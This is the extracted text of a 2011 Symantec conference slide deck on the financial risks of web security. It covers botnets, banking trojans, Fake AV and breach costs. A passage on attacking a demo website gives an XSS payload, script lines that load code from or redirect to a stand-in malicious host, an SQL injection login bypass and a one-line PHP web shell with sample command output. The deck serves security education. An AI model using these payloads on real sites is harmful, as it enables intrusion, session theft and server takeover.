Financial Risks to Internet Security

1

Costs and Financial Risks of Web Security

Martin Lee CISSP CEng

Dr. Les Pritchard CITP

SR B03 - Costs and Financial Risks of Web Security

SYMANTEC VISION 2011

Where the Threats Come From.

2

Insider threats

Acts of God

Malicious outsiders

(cybercriminals)

Mostly accidental data deletion.

Fire, flood, volcanos!

Malware, banking trojans.



How the Bad Guys Make Money

3SR B03 - Costs and Financial Risks of Web Security


Anyone’s Computer or Your Computer?

SR B03 - Costs and Financial Risks of Web Security 4

Botnets

Banking trojans

Targeted attacks

Compromising any computer.

Denial of service attacks.

Send spam.

Steal data.

Compromising any computer.

Internet bank robbery.

Compromising specific systems.

Stealing high value data.


Making Money From Botnets – Sending Spam

Traffic analysis of rogue website

26 days, 350 million spams, 28 sales

But, when scaled up

~$7000 in sales per day

~$2M per year

Source :

C. Kanich et al. “Spamalytics: An Empirical Analysis of Spam Marketing Conversion”. Nov 2008

(http://www.icsi.berkeley.edu/pubs/networking/2008-ccs-spamalytics.pdf)



Making Money From Botnets – Denial of Service


Can hit 100Gb/sec attack traffic.

Estimated UK losses $3bn/yr.


Making Money From Banking Trojans


Source : http://www.wired.com/threatlevel/2010/10/zeus-ukraine-arrests/


Banking Trojans – Zeus Man-in-Browser Attack


Malware waits for log in to internet banking,issues payments on your behalf to money mules.


Banking Trojans – Zeus Man-in-Browser Attack


Malware intercepts data sent from bank,removes it’s transfers, adjusts balance, shows you what you expect to see.


Distributing Web Malware


Gumblar Lifecycle

HACKERXSS

EXPLOITMALWARE

HOST

UNAFECTED

WEBSITE

ADDS

XSS

EXPLOIT

VICTIM

CONTROLS

VISITS

FORWARDS

INSTALLS

MALWARE

STEALS

LOGIN

Uploading web malware to your websiteby stealing your login details.


Malware on Legitimate Domains

11

0%

20%

40%

60%

80%

100%

0 30 60 90 120 150 180Days

Malicious domains lifecycle: % remaining active over time

“Old” domains

“New” Domains

Over time more than 80% ofmalicious domainsare “Old” domains

80%



Employee Browsing Habits



Browsing Habits Outside of the Office


0

20

40

60

80

100

20 40 60 80 100

Mobile

Office

% of users

% o

f w

eb

blo

cks


Subvert a legitimate website

WEB PAGE

Adverts

Sold by sales team

Sold by reseller

resold further

advertiser

advertiser

Malware

distributor

Distributing Web Malware – Advertising Services



Fake AV



Fake AV

Do the maths –

1 million products sold

@$39.95

$8.2 million fine

= $31.75 million profit!

Source: http://www.pcworld.com/businesscenter/article/217987/alleged_scareware_vendors_to_pay_82_million_to_ftc.html



Attacking Your Website



My Website – XSS Example

18

www.example.com/index.php?page=cat&category=1&PHPSESSID=




19

www.example.com/index.php?page=cat&category=1&PHPSESSID=

becomes

www.example.com/index.php?page=cat&category=%3E%0A%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D

Attack JS –

"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

URL encode it, replace ‘category’ value




20

Attacker can execute whatever they like:

Exploit – <script src=“http://www.malicious.com/attack.js”>

Redirect – window.location.href = “http://www.malicious.com/“

Why not? – document.product.price = “0.01”



XSS Example – Click that link

21

Email containing link

Embed link in discussion page

WEB PAGE

ENTER TEXT SUBMIT

I agree. <img src=“/images/smiley.gif” onload=“document.location=‘http://malicious/’”>



SQL Injection – “Little Bobby Tables”


Source: XKCD Comic - http://xkcd.com/327/


My Website – SQL Injection Example

23

SQL injection:

Select * from users where username = “$input” and password=md5($password);

$input = ‘ admin”; -- ‘

Select * from users where username = “admin”; -- ... ignored



My Website – SQL Injection Example

24

How about a file like this?

<? system($_REQUEST*‘cmd’+); ?>



My Website – Now completely at mercy of attacker

25

ls -l -> %6C%73%20%2D%6C

total 36-rw-rw-r-- 1 martin martin 191 Nov 27 2003 categories.phpdrwxrwxr-x 2 martin martin 4096 Mar 16 17:53 inc-rw-rw-r-- 1 martin martin 543 Mar 29 14:54 index.old-rw-r--r-- 1 martin martin 124 Mar 29 15:03 index.php-rw-rw-r-- 1 martin martin 537 Mar 29 14:41 index.php~-rw-rw-r-- 1 martin martin 2068 Mar 29 16:20 product_image.php-rw-rw-r-- 1 martin martin 1924 Nov 28 2003 product_image.php~-rw-rw-r-- 1 martin martin 189 Nov 27 2003 products.php-rw-r--r-- 1 martin martin 31 Mar 29 15:04 shell.php

http://www.example.com/images/shell.php?cmd=%6C%73%20%2D%6C



Vulnerable Websites

26

Skilled attackers can easily find vulnerabilities.

Others can use a list of vulnerable websites.



How You Lose Money



Data Breach Losses

• Ponemon Institute & Symantec Research

– Average cost per data breach $7.2 million.

– $214 per breached record.

– 31% of breaches are malicious or criminal attack.

– Malicious attacks cost more $318 per breached record.

28

See: http://www.symantec.com/about/news/release/article.jsp?prid=20110308_01

Calculate your risk: http://databreachcalculator.com/



0%

10%

20%

30%

40%

50%

60%

Environment downtime

Corporate data theft

Customer or employee PI theft

Customer financial information theft

Intellectual property theft

Symantec SMB Survey – What do SMBs suffer?



Protecting Yourself.



Know Your Assets, Know Attack Vectors



Layers of Protection Provide Maximum Detection



Test & Monitor Your Web Services


Find & fix vulnerabilities in

your web services.

Monitor logs to identify attacks,

block attacker.

You don’t need to be perfect,

just better than your

competitors.

Thank you!

Copyright © 2011 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.

This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.

34

Martin Lee

[email protected]

+44 1452 627 042


Technology

Financial Risks to Internet Security